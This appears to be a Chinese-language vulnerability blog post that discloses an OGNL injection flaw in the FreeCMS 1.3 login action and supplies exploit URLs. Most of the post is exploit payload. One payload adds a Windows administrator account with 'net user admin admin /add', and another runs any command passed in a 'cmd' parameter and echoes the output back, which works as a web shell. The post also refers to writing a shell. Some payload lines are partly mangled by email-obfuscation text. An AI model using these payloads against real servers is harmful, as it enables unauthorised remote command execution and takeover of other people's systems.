FreeCms 命令执行(Ognl执行顺序绕过漏洞附EXP)

  • A+
所属分类:漏洞时代
摘要

Author:园长开源免费java CMS – FreeCMS1.3-数据对象-mail项目地址:https://code.google.com/p/freecms/

Author:园长

开源免费java CMS - FreeCMS1.3-数据对象-mail

项目地址:https://code.google.com/p/freecms/

之前公布的EXP利用工具是不行的,不过可以用我之前发布的某工具执行命令,写shell。

漏洞描述(看EXP3利用就行了):

找到登录页面:http://localhost:8080/ff/login.jsp

自行从源码里面获取表单参数,或用上面说的工具自动提取。

然后修改提交的action:http://localhost:8080/ff/login_login.do?user.loginname=EXP

选择类型为String的请求就行了

添加帐号:http://localhost:8080/ff/login_login.do?user.loginname=%28%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D+new+java.lang.Boolean%28false%29,%20%23_memberAccess[%22allowStaticMethodAccess%22]%3d+new+java.lang.Boolean%28true%29,%[email protected]@getRuntime%28%29.exec('net user admin admin /add%27%29%29%28meh%29&z[%28user.loginname%29%28%27meh%27%29]=true

有人说命令执行呢?哪里?呵呵,改改之前的EXP不就解决了:

http://localhost:8080/ff/login_login.do?user.loginname=(

%23context["xwork.MethodAccessor.denyMethodExecution"]= new java.lang.Boolean(false),

%23_memberAccess["allowStaticMethodAccess"]=new java.lang.Boolean(true),

%[email protected]@getRequest(),

%[email protected]@getRuntime().exec(%23req.getParameter(%22cmd%22)),

%23iswinreader=new java.io.DataInputStream(%23exec.getInputStream()),

%23buffer=new byte[1000],

%23iswinreader.readFully(%23buffer),

%23result=new java.lang.String(%23buffer),

%[email protected]@getResponse(),

%23response.getWriter().println(%23result)

)

&z[(user.loginname)('meh')]=true&cmd=cmd /c set

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: